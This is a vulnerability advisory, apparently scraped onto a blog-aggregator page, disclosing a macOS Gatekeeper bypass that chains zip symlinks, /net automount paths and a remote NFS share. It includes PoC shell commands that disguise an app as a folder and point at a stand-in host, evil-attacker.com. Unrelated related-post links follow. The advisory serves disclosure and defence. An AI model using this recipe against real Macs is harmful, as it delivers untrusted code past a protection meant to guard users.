MacOS X GateKeeper Bypass
MacOS X GateKeeper Bypass
OVERVIEW
On MacOS X version <= 10.14.5 (at time of writing) is it possible to easily bypass Gatekeeper in order to
execute untrusted code without any warning or user's explicit permission.
Gatekeeper is a mechanism developed by Apple and included in MacOS X since 2012 that enforces code
signing and verifies downloaded applications before allowing them to run.
For example, if a user donwloads an application from internet and executes it, Gatekeeper will prevent it from
running without user's consens.
DETAILS
As per-design, Gatekeeper considers both external drives and network shares as safe locations and it allows
any application they contain to run.
By combining this design with two legitimate features of MacOS X, it will result in the complete deceivement of
the intended behaviour.
The first legit feature is automount (aka autofs) that allows a user to automatically mount a network share just
by accessing a "special" path, in this case, any path beginning with "/net/".
For example
ls /net/evil-attacker.com/sharedfolder/
will make the os read the content of the 'sharedfolder' on the remote host (evil-attacker.com) using NFS.
The second legit feature is that zip archives can contain symbolic links pointing to an arbitrary location
(including automount enpoints) and that the software on MacOS that is responsible to decompress zip files
do not perform any check on the symlinks before creatig them.
To better understand how this exploit works, let's consider the following scenario:
An attacker crafts a zip file containing a symbolic link to an automount endpoint she/he controls
(ex Documents -> /net/evil.com/Documents) and sends it to the victim.
The victim downloads the malicious archive, extracts it and follows the symlink.
Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled
executable can be run without any warning. The way Finder is designed (ex hide .app extensions, hide full path
from titlebar) makes this tecnique very effective and hard to spot.
The following video illustrates the concept
PoC
In order to reproduce this issue, follow the steps below:
• create a zip file with a symlink to an automount endpoint
• mkdir Documents
• ln -s /net/linux-vm.local/nfs/Documents Documents/Documents
• zip -ry Documents.zip Documents
• create an application (.app folder) with the code you want to run
• cp -r /Applications/Calculator.app PDF.app
• echo -e '#!/bin/bash'"\n"'open /Applications/iTunes.app' > PDF.app/Contents/MacOS/Calculator
• chmod +x PDF.app/Contents/MacOS/Calculator
• rm PDF.app/Contents/Resources/AppIcon.icns
• ln -s /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/GenericFolderIcon.icns PDF.app/Contents/Resources/AppIcon.icns
• create a publicily accessible NFS share and put the .app in it
• ssh linux-vm.local
• mkdir -p /nfs/Documents
• echo '/nfs/Documents *(insecure,rw,no_root_squash,anonuid=1000,anongid=1000,async,nohide)' >> /etc/exports
• service nfs-kernel-server restart
• scp -r mymac.local:PDF.app /nfs/Documents/
• upload the zip somewhere in internet and download it so it gets the quarantine flag used by Gatekeeper
• extract the zip (if needed) and navigate it
HISTORY
The
vendor has been contacted on February 22th 2019 and it's aware of this
issue. This issue was supposed to be addressed, according t
the vendor, on May 15th 2019 but Apple started dropping my emails.
Since Apple is aware of my 90 days disclosure deadline, I make this information public.
SOLUTION
No solution is available yet.
A possible workaround is to disable automount:
• Edit /etc/auto_master as root
• Comment the line beginning with '/net'
• Reboot
REFERENCES
https://fcvl.net/
https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass
CREDITS
Filippo Cavallarin
filippo.cavallarin@wearesegment.com
MacOS X GateKeeper Bypass的更多相关文章
- APPLE-SA-2019-3-25-2 macOS Mojave 10.14.4,Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra
APPLE-SA-2019-3-25-2 macOS Mojave 10.14.4, Security Update2019-002 High Sierra, Security Update 2019 ...
- VMware15安装MAC(MAC OS 10.13)(OS X 10.14)原版可升级最新可解锁macOS Unlocker3.0(OS X 10.13)
目录树 1.1.2安装环境: 1.1.3所需资源: 1.1.4 Unlocker 3.0解锁 1.1.5 配置环境 1.1.6开始安装 1.1.7开启虚拟机进入MAC安装界面 1.1.8 macO ...
- 安装macOS Sierra后怎么找回“任何来源”选项
安装macOS Sierra后,会发现系统偏好设置的“安全与隐私”中默认已经去除了允许“任何来源”App的选项,无法运行一些第三方应用(提示xx.app已经损坏).如果需要恢复允许“任何来源”的选项, ...
- macOS Sierra 10.12.4 (16E195) - Clover [ 20170403 ]
原文:https://user.qzone.qq.com/753313822/blog/1424460141?_t_=0.48652242555134495 建议使用 1920 * 1080 屏幕分辨 ...
- macOS Sierra 最新系统找回允许任何软件安装
终端输入就可以了 安装macOS Sierra后,会发现系统偏好设置的“安全与隐私”中默认已经去除了允许“任何来源”App的选项,无法运行一些第三方应用. 如果需要恢复允许“任何来源”的选项,即关闭G ...
- 第一篇 HTML5打包APP之VMware15安装MAC(MAC OS 10.13)(OS X 10.14)原版可升级最新可解锁macOS Unlocker3.0(OS X 10.13)
1.1.2安装环境: 1.1.3所需资源: 1.1.4 Unlocker 3.0解锁 1.1.5 配置环境 1.1.6开始安装 1.1.7开启虚拟机进入MAC安装界面 1.1.8 macOS 10.1 ...
- macOS 10.13允许任何来源开启方法
软件下载网站: http://www.pc6.com/ 软件安装问题: macOS 10.13允许任何来源开启方法: 如果需要恢复允许“任何来源”的选项,即关闭系统的Gatekeeper,我们可以在“ ...
- java高版本下各种JNDI Bypass方法复现
目录 0 前言 1 Java高版本JNDI绕过的源代码分析 1.1 思路一的源码分析 1.2 思路二的源码分析 2 基于本地工厂类的利用方法 2.1 org.apache.naming.factory ...
- TODO:macOS编译PHP7.1
TODO:macOS编译PHP7.1 本文主要介绍在macOS上编译PHP7.1,有兴趣的朋友可以去尝试一下. 1.下载PHP7.1源码,建议到PHP官网下载纯净到源码包php-7.1.0.tar.g ...
随机推荐
- 【问题解决】Flasgger mapping values are not allowed here?
参考来源:https://stackoverflow.com/questions/9055371/python-and-pyaml-yaml-scanner-scannererror-mapping- ...
- Django中的ModelForm与Form
django表单系统中,所有的表单类都作为django.forms.Form的子类创建,包括ModelForm. 关于django中的表单系统有两种: 基于django.forms.Form 基于dj ...
- LeetCode_387. First Unique Character in a String
387. First Unique Character in a String Easy Given a string, find the first non-repeating character ...
- 定时显示提示信息(TToolTip)
{ 修改者:ghs 日期:20071218 功能:在原版本的基础上增加. RegisterControl:注册需要提示的控件. BeginHelp:设置光标状态为帮助crHelp: 鼠标弹起后,显示注 ...
- angular2-cookie 如何升级到 ngx-cookie
angular2-cookie 如何升级到 ngx-cookie https://github.com/salemdar/angular2-cookie#readme
- RF之条件判断、初始化清除-4
条件判断: rf中用run keyword if 关键字做条件判断,以此来达到类似在python中if ...else...条件判断的功能. 注意:ELSE IF一定都是大写的,不然运行 ...
- 重磅!滴滴跨端框架Chameleon 1.0正式发布
滴滴在 GitHub 上开源的跨端解决方案 Chameleon(简写 CML)正式发布 1.0 版本,中文名卡梅龙:中文意思变色龙,意味着就像变色龙一样能适应不同环境的企业级跨端整体解决方案,具有易用 ...
- C语言实现从左向右字幕滚动的效果
#include <stdio.h> #include <string.h> #include <windows.h> int main() { char str[ ...
- php str_getcsv解决explode不能解决的问题
php str_getcsv解决explode不能解决的问题 <pre><?php$str = "中国,广东省,广州市,天河区,'113.329884,23.154799' ...
- composer安装扩展包异常
我是tp5.1下,用composer安装扩展包,在命令行运行,无任何不反应,不下载也不报错,这时,我们先ctrl+c退出执行的命令,然后在tp5.1根目录下,找到composer.json文件,并用编 ...